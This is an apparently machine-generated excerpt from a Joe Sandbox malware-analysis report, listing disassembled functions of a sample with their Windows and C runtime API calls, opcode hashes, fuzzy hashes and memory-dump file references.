Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: fb9b173f7530ff59a633f2238c8bcae904297b345914dfe04c58144594b52457
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: 9231D421629AC145FA219F31E9503AE6358FF84BE0F400336EE6D87BC9DF2CD6158700

Function 00007FF6D924CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D924CF4B), ref: 00007FF6D924D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D924CF4B), ref: 00007FF6D924D107

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: ba667c0bff18b1eec9ab4b8fdf345d2d11d433ffd5b9d411a969d9730be33bc8
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 3E91DA72F2865185F751DF6596402BD2BA0FB58B88F544237DE0EA7A85DF3CE462CB00

Function 00007FF6D924F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6D924FA7C
_get_daylight.LIBCMT ref: 00007FF6D924FA8D
_get_daylight.LIBCMT ref: 00007FF6D924FA9E
_isindst.LIBCMT ref: 00007FF6D924FB69

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: a18ebf2d354ac7cd8f8915c8e4a92c62b3556044847305d826d18e602c414985
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 5F511B72F2461186FB14CF649A956FC7BA1AFAD358F500236DD1D93AE5DF38A412CB00

Function 00007FF6D924577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF6D92457AF
GetFileInformationByHandle.KERNELBASE ref: 00007FF6D9245811
GetLastError.KERNEL32 ref: 00007FF6D92458A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D92456B4), ref: 00007FF6D92458EE

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
Instruction ID: d3d97a465618dac81ca124e1ec75ad650c1571004804ef2f0c2d27e82a3a87a3
Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
Instruction Fuzzy Hash: 7D519032E286418AFB50CFB1D6507BD37A1AF58B58F104436DE8D9B688DF38D4A0CB41

Function 00007FF6D9245628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9245655
CreateFileW.KERNELBASE ref: 00007FF6D9245694
CloseHandle.KERNEL32 ref: 00007FF6D92456C9

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction ID: 4bd8a6d6e3338396ce3581baafd89826b93fa237c69b7b37641e0a526bde3ee6
Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction Fuzzy Hash: 96418122E2878183F7508F61965077D6260FBA87A4F109336E69C87AD5DF7CA5F08B00

Function 00007FF6D923CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D923CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6D923CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6D923CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF6D923CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6D923CD21

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 0a972299de8ad1186caadff4c1d0e0b737b202370ad94a3338b5272d79bdbaed
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 12316825E3820741FA64FF35AB223BD2291AF51784F44443BED4ECB2E7CE2DA8248700

Function 00007FF6D9249A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6D9249A2C), ref: 00007FF6D9249A41
TerminateProcess.KERNEL32(?,?,?,00007FF6D9249A2C), ref: 00007FF6D9249A4C
ExitProcess.KERNEL32 ref: 00007FF6D9249A5B

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: 4fa120f3ec33c674b4b1e1c66f23d07a9760bdcd01767904344683e2e7eb2403
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: EED05218B2830642FF882F301E8807C12112FACF10F00243AD80BC2387ED2CA8294700

Function 00007FF6D924013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240277

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction ID: 8368bc43de5a3acd4f69b612e6b4baf8389e9f017179884829e2410bd46df6f0
Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
Instruction Fuzzy Hash: 21513921B6964186F7649E25D60067E6A90BFADBA4F084732DD6D837C5CF3CE4A08F00

Function 00007FF6D924C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6D924C2CD), ref: 00007FF6D924C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF6D924C2CD), ref: 00007FF6D924C18A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: bb4afe6130949286cc25838fd858e07723a3901609699a80198f6091d4f1b534
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 2511C461728A8181EA20DF29BA141BD6361AB59FF4F544332EE7D877D9CE3CD0218B00

Function 00007FF6D9245924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9245839), ref: 00007FF6D9245957
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9245839), ref: 00007FF6D924596D

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction ID: ac61598674ab23ac03efe9e45dce5477f60fd561b7bc18f82afdd56701e1f9f5
Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction Fuzzy Hash: E711BC32A2C64282FA508F54A51043EB7A0FB99771F50023BFADAC19D8EF6CD424CF00

Function 00007FF6D924A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A95E
GetLastError.KERNEL32(?,?,?,00007FF6D9252D22,?,?,?,00007FF6D9252D5F,?,?,00000000,00007FF6D9253225,?,?,?,00007FF6D9253157), ref: 00007FF6D924A968

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 19f8c17ae0ac3c83d2c1231459a432ef03910fce6403aa520071586738410de9
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: B8E0C220F3960383FF086FF2AA4517D12906FACB40F850037C90DD22A1EE2C68B18B10

Function 00007FF6D924AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6D924A9D5,?,?,00000000,00007FF6D924AA8A), ref: 00007FF6D924ABC6
GetLastError.KERNEL32(?,?,?,00007FF6D924A9D5,?,?,00000000,00007FF6D924AA8A), ref: 00007FF6D924ABD0

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: de7b39f593eda9b874492d04c678607ffd7df2c00d9ac62b343a44834e533d5b
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: DA21A825F3868241FA959F51975037D16929FBC790F04423BD96EC77D6CE6CE4614B00

Function 00007FF6D924BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924BED4

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 3e305909ed9035c5480331e4093d61f1ec883b24cdc72669d962226897ab8005
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: E241B33292864187FA748E29AA4027D73A0EB6D791F100132EB8EC36D5CF6CE422CF51

Function 00007FF6D9237F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6D923803A

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 10e7562e960f8d99c449f474851a74073af959b335e7b5ea493964aac480507e
Instruction ID: 21ec0ddbdae122eda9dff3e46af2f6e21c472cf5334bbe4eddc644348b9806e0
Opcode Fuzzy Hash: 10e7562e960f8d99c449f474851a74073af959b335e7b5ea493964aac480507e
Instruction Fuzzy Hash: 9721F721B2A65256FE509F72AA043BE9651BF59BC4F8C4436EE0D8F786CE7DE061C700

Function 00007FF6D924B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D924B9C2

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: fa2df93afac728ddbd7c397525aacfbdeab6b082135f0530c083ec9ad802b4ef
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: FF318432E38A5285FB116F559A4137C26A0AFA8BA4F920137E95D873D2CF7CE4618F11

Function 00007FF6D9249961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6D924998F

Part of subcall function 00007FF6D9249A88: GetModuleHandleExW.KERNEL32 ref: 00007FF6D9249AAD
Part of subcall function 00007FF6D9249A88: GetProcAddress.KERNEL32 ref: 00007FF6D9249AC3
Part of subcall function 00007FF6D9249A88: FreeLibrary.KERNEL32 ref: 00007FF6D9249AEA

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 626cdf83adc05de954d7eb27fc075520fab10e5be548b54bd11f35fdadebcaea
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 31218B76A247458AFF248F68C4802AC33A0FB58B18F040637D76C86BC5DF38E5A4CB40

Function 00007FF6D9245F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9245EF9

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 379ab22525ff91d14c3339392c014db0841dc36d48757fae6998fd1d095aba69
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: B5117532A3C64181FA619F91A60057DA2A4BFADB84F454433EACDD7A96CF3DE4209F41

Function 00007FF6D9256354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9256377

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff6d9230000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 7ac2e1b612b04652e23c232ae5a5e7088178a1190a66b353f5ca8a3b42d4da34
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 48219232A28A4186FBA18F18D54037E76A0FB94F64F544236E65EC76D9DF3CD8258B00

Function 00007FF6D92403BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9240410

Memory Dump Source

Source File: 00000004.00000002.2682032497.00007FF6D9231000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9230000, based on PE: true

Associated: 00000004.00000002.2681967671.00007FF6D9230000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682096219.00007FF6D925B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D926E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682158949.00007FF6D9272000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2682307291.00007FF6D9274000.00000002.00000001.01000000.00000009.sdmpDownload File

